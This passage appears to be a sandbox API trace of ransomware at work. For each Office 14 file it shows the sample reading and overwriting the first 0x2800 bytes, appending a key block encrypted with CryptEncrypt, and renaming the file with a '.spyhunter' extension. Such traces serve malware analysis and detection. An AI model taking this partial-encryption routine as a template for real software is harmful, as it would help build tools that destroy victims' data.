hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa6c*=0x2800, lpOverlapped=0x0) returned 1 [0111.382] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.382] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa6c*=0x2800, lpOverlapped=0x0) returned 1 [0111.382] GetProcessHeap () returned 0x2c0000 [0111.382] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.382] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.382] WriteFile (in: hFile=0x154, lpBuffer=0x25cfaac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x25cfaac*, lpNumberOfBytesWritten=0x25cfa6c*=0x4, lpOverlapped=0x0) returned 1 [0111.405] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa6c*=0x30, lpOverlapped=0x0) returned 1 [0111.406] CloseHandle (hObject=0x154) returned 1 [0111.406] GetProcessHeap () returned 0x2c0000 [0111.406] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.406] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PE.DLL.spyhunter") returned 63 [0111.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PE.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pe.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PE.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pe.dll.spyhunter")) returned 1 [0111.407] GetProcessHeap () returned 0x2c0000 [0111.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.407] GetProcessHeap () returned 0x2c0000 [0111.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.407] GetProcessHeap () returned 0x2c0000 [0111.407] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a678 | out: hHeap=0x2c0000) returned 1 [0111.407] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfab0 | out: pbBuffer=0x25cfab0) returned 1 [0111.407] GetProcessHeap () returned 0x2c0000 [0111.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.407] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaa8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaa8*=0x30) returned 1 [0111.407] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PSTPRX32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pstprx32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0111.408] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PSTPRX32.DLL") returned 59 [0111.408] StrStrW (lpFirst="PSTPRX32.DLL", lpSrch=".txt") returned 0x0 [0111.408] GetProcessHeap () returned 0x2c0000 [0111.408] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.409] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa6c*=0x2800, lpOverlapped=0x0) returned 1 [0111.498] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.498] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa6c*=0x2800, lpOverlapped=0x0) returned 1 [0111.499] GetProcessHeap () returned 0x2c0000 [0111.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.500] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.500] WriteFile (in: hFile=0x154, lpBuffer=0x25cfaac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x25cfaac*, lpNumberOfBytesWritten=0x25cfa6c*=0x4, lpOverlapped=0x0) returned 1 [0111.505] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa6c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa6c*=0x30, lpOverlapped=0x0) returned 1 [0111.505] CloseHandle (hObject=0x154) returned 1 [0111.506] GetProcessHeap () returned 0x2c0000 [0111.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.506] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PSTPRX32.DLL.spyhunter") returned 69 [0111.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PSTPRX32.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pstprx32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PSTPRX32.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pstprx32.dll.spyhunter")) returned 1 [0111.507] GetProcessHeap () returned 0x2c0000 [0111.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.507] GetProcessHeap () returned 0x2c0000 [0111.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.507] GetProcessHeap () returned 0x2c0000 [0111.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfacc0 | out: hHeap=0x2c0000) returned 1 [0111.507] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaa8 | out: pbBuffer=0x25cfaa8) returned 1 [0111.507] GetProcessHeap () returned 0x2c0000 [0111.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.507] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaa0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaa0*=0x30) returned 1 [0111.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.517] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.DLL") returned 64 [0111.517] StrStrW (lpFirst="MSTH7FR.DLL", lpSrch=".txt") returned 0x0 [0111.517] GetProcessHeap () returned 0x2c0000 [0111.517] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.518] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfa64*=0x2800, lpOverlapped=0x0) returned 1 [0111.529] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.529] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa64, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfa64*=0x2800, lpOverlapped=0x0) returned 1 [0111.529] GetProcessHeap () returned 0x2c0000 [0111.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0111.529] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.529] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfaa4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa64, lpOverlapped=0x0 | out: lpBuffer=0x25cfaa4*, lpNumberOfBytesWritten=0x25cfa64*=0x4, lpOverlapped=0x0) returned 1 [0111.547] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa64, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa64*=0x30, lpOverlapped=0x0) returned 1 [0111.553] CloseHandle (hObject=0xb4) returned 1 [0111.553] GetProcessHeap () returned 0x2c0000 [0111.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.553] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.DLL.spyhunter") returned 74 [0111.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROOF\\MSTH7FR.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\proof\\msth7fr.dll.spyhunter")) returned 1 [0111.554] GetProcessHeap () returned 0x2c0000 [0111.554] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.554] GetProcessHeap () returned 0x2c0000 [0111.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.555] GetProcessHeap () returned 0x2c0000 [0111.555] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce3660 | out: hHeap=0x2c0000) returned 1 [0111.557] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaa0 | out: pbBuffer=0x25cfaa0) returned 1 [0111.557] GetProcessHeap () returned 0x2c0000 [0111.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.557] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa98*=0x30) returned 1 [0111.557] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub9.bdr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.558] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR") returned 63 [0111.558] StrStrW (lpFirst="MSPUB9.BDR", lpSrch=".txt") returned 0x0 [0111.558] GetProcessHeap () returned 0x2c0000 [0111.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0111.558] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa5c*=0x2800, lpOverlapped=0x0) returned 1 [0111.594] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.594] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa5c*=0x2800, lpOverlapped=0x0) returned 1 [0111.594] GetProcessHeap () returned 0x2c0000 [0111.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0111.594] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.595] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfa9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa9c*, lpNumberOfBytesWritten=0x25cfa5c*=0x4, lpOverlapped=0x0) returned 1 [0111.600] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa5c*=0x30, lpOverlapped=0x0) returned 1 [0111.600] CloseHandle (hObject=0xb4) returned 1 [0111.600] GetProcessHeap () returned 0x2c0000 [0111.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.600] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR.spyhunter") returned 73 [0111.600] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub9.bdr"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBBA\\MSPUB9.BDR.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubba\\mspub9.bdr.spyhunter")) returned 1 [0111.601] GetProcessHeap () returned 0x2c0000 [0111.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.601] GetProcessHeap () returned 0x2c0000 [0111.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.601] GetProcessHeap () returned 0x2c0000 [0111.601] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dedc68 | out: hHeap=0x2c0000) returned 1 [0111.601] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaa0 | out: pbBuffer=0x25cfaa0) returned 1 [0111.601] GetProcessHeap () returned 0x2c0000 [0111.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.601] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa98*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa98*=0x30) returned 1 [0111.602] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.645] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML") returned 66 [0111.645] StrStrW (lpFirst="DGCHKBRD.XML", lpSrch=".txt") returned 0x0 [0111.645] GetProcessHeap () returned 0x2c0000 [0111.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.645] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfa5c*=0x29e, lpOverlapped=0x0) returned 1 [0111.646] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffd62, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.646] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfa5c*=0x29e, lpOverlapped=0x0) returned 1 [0111.647] GetProcessHeap () returned 0x2c0000 [0111.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.647] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.647] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfa9c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa9c*, lpNumberOfBytesWritten=0x25cfa5c*=0x4, lpOverlapped=0x0) returned 1 [0111.647] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa5c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa5c*=0x30, lpOverlapped=0x0) returned 1 [0111.647] CloseHandle (hObject=0x16c) returned 1 [0111.647] GetProcessHeap () returned 0x2c0000 [0111.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.647] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML.spyhunter") returned 76 [0111.648] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGCHKBRD.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgchkbrd.xml.spyhunter")) returned 1 [0111.650] GetProcessHeap () returned 0x2c0000 [0111.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.650] GetProcessHeap () returned 0x2c0000 [0111.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.650] GetProcessHeap () returned 0x2c0000 [0111.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce68c0 | out: hHeap=0x2c0000) returned 1 [0111.650] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa98 | out: pbBuffer=0x25cfa98) returned 1 [0111.650] GetProcessHeap () returned 0x2c0000 [0111.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.650] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa90*=0x30) returned 1 [0111.651] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.652] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML") returned 66 [0111.652] StrStrW (lpFirst="DGWEBBTN.XML", lpSrch=".txt") returned 0x0 [0111.652] GetProcessHeap () returned 0x2c0000 [0111.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.653] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfa54*=0x110e, lpOverlapped=0x0) returned 1 [0111.695] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffeef2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.695] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x110e, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfa54*=0x110e, lpOverlapped=0x0) returned 1 [0111.696] GetProcessHeap () returned 0x2c0000 [0111.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.696] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.696] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfa94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x25cfa94*, lpNumberOfBytesWritten=0x25cfa54*=0x4, lpOverlapped=0x0) returned 1 [0111.696] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa54*=0x30, lpOverlapped=0x0) returned 1 [0111.696] CloseHandle (hObject=0x16c) returned 1 [0111.696] GetProcessHeap () returned 0x2c0000 [0111.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.696] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML.spyhunter") returned 76 [0111.697] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGWEBBTN.XML.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgwebbtn.xml.spyhunter")) returned 1 [0111.698] GetProcessHeap () returned 0x2c0000 [0111.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.698] GetProcessHeap () returned 0x2c0000 [0111.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0111.699] GetProcessHeap () returned 0x2c0000 [0111.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce81f0 | out: hHeap=0x2c0000) returned 1 [0111.699] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfa98 | out: pbBuffer=0x25cfa98) returned 1 [0111.699] GetProcessHeap () returned 0x2c0000 [0111.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0111.699] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfa90*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfa90*=0x30) returned 1 [0111.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\sidbar98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.807] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\SIDBAR98.POC") returned 66 [0111.807] StrStrW (lpFirst="SIDBAR98.POC", lpSrch=".txt") returned 0x0 [0111.807] GetProcessHeap () returned 0x2c0000 [0111.807] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0111.807] ReadFile (in: hFile=0x16c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfa54*=0x2800, lpOverlapped=0x0) returned 1 [0112.137] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.137] WriteFile (in: hFile=0x16c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfa54*=0x2800, lpOverlapped=0x0) returned 1 [0112.137] GetProcessHeap () returned 0x2c0000 [0112.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.138] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.138] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfa94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x25cfa94*, lpNumberOfBytesWritten=0x25cfa54*=0x4, lpOverlapped=0x0) returned 1 [0112.213] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfa54, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfa54*=0x30, lpOverlapped=0x0) returned 1 [0112.213] CloseHandle (hObject=0x16c) returned 1 [0112.213] GetProcessHeap () returned 0x2c0000 [0112.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0112.213] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft 